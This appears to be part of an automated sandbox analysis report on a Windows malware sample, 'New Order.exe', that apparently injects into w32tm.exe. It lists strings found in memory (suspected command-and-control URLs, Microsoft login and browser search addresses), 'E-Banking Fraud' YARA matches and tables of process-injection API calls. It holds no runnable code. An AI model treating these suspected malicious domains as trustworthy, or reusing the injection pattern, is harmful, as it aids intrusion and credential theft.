                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/__media__/design/underconstructionnotice.php?d=614genetics.online
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/__media__/js/trademark.php?d=614genetics.online&type=ns
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/display.cfm
                Source: XVZmwHdSYwx.exe, 00000011.00000002.4636187188.00000000052B9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org
                Source: XVZmwHdSYwx.exe, 00000011.00000002.4636187188.00000000052B9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org/j7q9/
                Source: w32tm.exe, 0000000E.00000002.4635164547.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003B70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&amp;u6nP_F48=dzHZVdeA6r6
                Source: w32tm.exe, 0000000E.00000002.4635164547.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003B70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: w32tm.exe, 0000000E.00000002.4635164547.00000000040A8000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003528000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: w32tm.exe, 0000000E.00000003.2686317848.0000000007D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: w32tm.exe, 0000000E.00000003.2687423557.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: w32tm.exe, 0000000E.00000003.2687423557.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: w32tm.exe, 0000000E.00000003.2687423557.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: w32tm.exe, 0000000E.00000003.2687423557.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: New Order.exe
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0042CE83 NtClose,8_2_0042CE83
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842B60 NtClose,LdrInitializeThunk,8_2_01842B60
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01842DF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01842C70
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018435C0 NtCreateMutant,LdrInitializeThunk,8_2_018435C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01844340 NtSetContextThread,8_2_01844340
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01844650 NtSuspendThread,8_2_01844650
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842B80 NtQueryInformationFile,8_2_01842B80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842BA0 NtEnumerateValueKey,8_2_01842BA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842BE0 NtQueryValueKey,8_2_01842BE0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842BF0 NtAllocateVirtualMemory,8_2_01842BF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842AB0 NtWaitForSingleObject,8_2_01842AB0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842AD0 NtReadFile,8_2_01842AD0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842AF0 NtWriteFile,8_2_01842AF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842DB0 NtEnumerateKey,8_2_01842DB0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842DD0 NtDelayExecution,8_2_01842DD0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842D00 NtSetInformationFile,8_2_01842D00
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842D10 NtMapViewOfSection,8_2_01842D10
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842D30 NtUnmapViewOfSection,8_2_01842D30
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842CA0 NtQueryInformationToken,8_2_01842CA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842CC0 NtQueryVirtualMemory,8_2_01842CC0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842CF0 NtOpenProcess,8_2_01842CF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842C00 NtQueryInformationProcess,8_2_01842C00
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842C60 NtCreateKey,8_2_01842C60
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842F90 NtProtectVirtualMemory,8_2_01842F90
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842FA0 NtQuerySection,8_2_01842FA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842FB0 NtResumeThread,8_2_01842FB0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842FE0 NtCreateFile,8_2_01842FE0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842F30 NtCreateSection,8_2_01842F30
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842F60 NtCreateProcessEx,8_2_01842F60
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842E80 NtReadVirtualMemory,8_2_01842E80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842EA0 NtAdjustPrivilegesToken,8_2_01842EA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842EE0 NtQueueApcThread,8_2_01842EE0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842E30 NtWriteVirtualMemory,8_2_01842E30
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01843090 NtSetValueKey,8_2_01843090
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01843010 NtOpenDirectoryObject,8_2_01843010
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018439B0 NtGetContextThread,8_2_018439B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01843D10 NtOpenProcessToken,8_2_01843D10
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01843D70 NtOpenThread,8_2_01843D70
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E4340 NtSetContextThread,LdrInitializeThunk,14_2_033E4340
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E4650 NtSuspendThread,LdrInitializeThunk,14_2_033E4650
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2B60 NtClose,LdrInitializeThunk,14_2_033E2B60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_033E2BA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_033E2BF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2BE0 NtQueryValueKey,LdrInitializeThunk,14_2_033E2BE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2AF0 NtWriteFile,LdrInitializeThunk,14_2_033E2AF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2AD0 NtReadFile,LdrInitializeThunk,14_2_033E2AD0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2F30 NtCreateSection,LdrInitializeThunk,14_2_033E2F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2FB0 NtResumeThread,LdrInitializeThunk,14_2_033E2FB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2FE0 NtCreateFile,LdrInitializeThunk,14_2_033E2FE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_033E2E80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2EE0 NtQueueApcThread,LdrInitializeThunk,14_2_033E2EE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_033E2D30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2D10 NtMapViewOfSection,LdrInitializeThunk,14_2_033E2D10
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_033E2DF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2DD0 NtDelayExecution,LdrInitializeThunk,14_2_033E2DD0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_033E2C70
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2C60 NtCreateKey,LdrInitializeThunk,14_2_033E2C60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_033E2CA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E35C0 NtCreateMutant,LdrInitializeThunk,14_2_033E35C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E39B0 NtGetContextThread,LdrInitializeThunk,14_2_033E39B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2B80 NtQueryInformationFile,14_2_033E2B80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2AB0 NtWaitForSingleObject,14_2_033E2AB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2F60 NtCreateProcessEx,14_2_033E2F60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2FA0 NtQuerySection,14_2_033E2FA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2F90 NtProtectVirtualMemory,14_2_033E2F90
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2E30 NtWriteVirtualMemory,14_2_033E2E30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2EA0 NtAdjustPrivilegesToken,14_2_033E2EA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2D00 NtSetInformationFile,14_2_033E2D00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2DB0 NtEnumerateKey,14_2_033E2DB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2C00 NtQueryInformationProcess,14_2_033E2C00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2CF0 NtOpenProcess,14_2_033E2CF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2CC0 NtQueryVirtualMemory,14_2_033E2CC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E3010 NtOpenDirectoryObject,14_2_033E3010
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E3090 NtSetValueKey,14_2_033E3090
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E3D10 NtOpenProcessToken,14_2_033E3D10
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E3D70 NtOpenThread,14_2_033E3D70
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979A30 NtCreateFile,14_2_00979A30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979BA0 NtReadFile,14_2_00979BA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979C90 NtDeleteFile,14_2_00979C90
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979D30 NtClose,14_2_00979D30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979EA0 NtAllocateVirtualMemory,14_2_00979EA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_02D9DF141_2_02D9DF14
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_055100401_2_05510040
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_055100061_2_05510006
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_0551AD981_2_0551AD98
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_0551AD891_2_0551AD89
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_060B11401_2_060B1140
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_060B11301_2_060B1130
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A3D481_2_074A3D48
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074AA5A01_2_074AA5A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A45B81_2_074A45B8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A636F1_2_074A636F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A63701_2_074A6370
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A49F01_2_074A49F0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A41801_2_074A4180
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00418D138_2_00418D13
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040E8078_2_0040E807
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040E8138_2_0040E813
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004012608_2_00401260
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00402A738_2_00402A73
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00402A808_2_00402A80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004104C38_2_004104C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0042F4E38_2_0042F4E3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004104BC8_2_004104BC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040E6C38_2_0040E6C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00402ED08_2_00402ED0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004106E38_2_004106E3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00416F0E8_2_00416F0E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00416F138_2_00416F13
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D01AA8_2_018D01AA
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C41A28_2_018C41A2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C81CC8_2_018C81CC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018001008_2_01800100
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AA1188_2_018AA118
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018981588_2_01898158
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A20008_2_018A2000
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D03E68_2_018D03E6
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181E3F08_2_0181E3F0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CA3528_2_018CA352
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018902C08_2_018902C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B02748_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D05918_2_018D0591
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018105358_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BE4F68_2_018BE4F6
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B44208_2_018B4420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C24468_2_018C2446
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180C7C08_2_0180C7C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018347508_2_01834750
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018107708_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182C6E08_2_0182C6E0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018129A08_2_018129A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018DA9A68_2_018DA9A6
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018269628_2_01826962
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E8F08_2_0183E8F0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181A8408_2_0181A840
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018128408_2_01812840
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F68B88_2_017F68B8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C6BD78_2_018C6BD7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CAB408_2_018CAB40
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180EA808_2_0180EA80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01828DBF8_2_01828DBF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180ADE08_2_0180ADE0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181AD008_2_0181AD00
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018ACD1F8_2_018ACD1F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0CB58_2_018B0CB5
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800CF28_2_01800CF2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810C008_2_01810C00
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188EFA08_2_0188EFA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01802FC88_2_01802FC8
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181CFE08_2_0181CFE0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01852F288_2_01852F28
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01830F308_2_01830F30
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B2F308_2_018B2F30
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01884F408_2_01884F40
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01822E908_2_01822E90
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CCE938_2_018CCE93
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CEEDB8_2_018CEEDB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CEE268_2_018CEE26
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810E598_2_01810E59
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FF1728_2_017FF172
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181B1B08_2_0181B1B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018DB16B8_2_018DB16B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0184516C8_2_0184516C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018170C08_2_018170C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BF0CC8_2_018BF0CC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C70E98_2_018C70E9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CF0E08_2_018CF0E0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0185739A8_2_0185739A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FD34C8_2_017FD34C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C132D8_2_018C132D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018152A08_2_018152A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182B2C08_2_0182B2C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B12ED8_2_018B12ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018AD5B08_2_018AD5B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C75718_2_018C7571
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CF43F8_2_018CF43F
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018014608_2_01801460
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CF7B08_2_018CF7B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C16CC8_2_018C16CC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018556308_2_01855630
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A59108_2_018A5910
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018199508_2_01819950
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182B9508_2_0182B950
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018138E08_2_018138E0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187D8008_2_0187D800
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182FB808_2_0182FB80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01885BF08_2_01885BF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0184DBF98_2_0184DBF9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CFB768_2_018CFB76
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01855AA08_2_01855AA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018ADAAC8_2_018ADAAC
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B1AA38_2_018B1AA3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BDAC68_2_018BDAC6
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CFA498_2_018CFA49
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C7A468_2_018C7A46
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01883A6C8_2_01883A6C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182FDC08_2_0182FDC0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01813D408_2_01813D40
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C1D5A8_2_018C1D5A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018C7D738_2_018C7D73
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CFCF28_2_018CFCF2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01889C328_2_01889C32
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01811F928_2_01811F92
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CFFB18_2_018CFFB1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018CFF098_2_018CFF09
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01819EB08_2_01819EB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346A35214_2_0346A352
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034703E614_2_034703E6
